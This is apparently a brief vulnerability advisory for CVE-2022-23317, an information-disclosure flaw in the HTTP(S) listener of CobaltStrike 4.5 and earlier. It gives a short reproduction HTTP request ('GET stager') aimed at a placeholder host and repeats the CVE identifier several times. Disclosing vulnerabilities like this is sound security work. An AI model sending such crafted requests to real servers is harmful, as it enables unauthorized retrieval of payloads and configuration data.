Description

CobaltStrike <=4.5 HTTP(S) listener does not determine whether the request URL begins with “/”, and attackers can obtain relevant information by specifying the URL.

Affected

  • CobaltStrike <= 4.5

Reproduction

1
2
3
GET stager HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0

CVE-2022-23317

CVE-2022-23317

CVE-2022-23317

CVE-2022-23317

References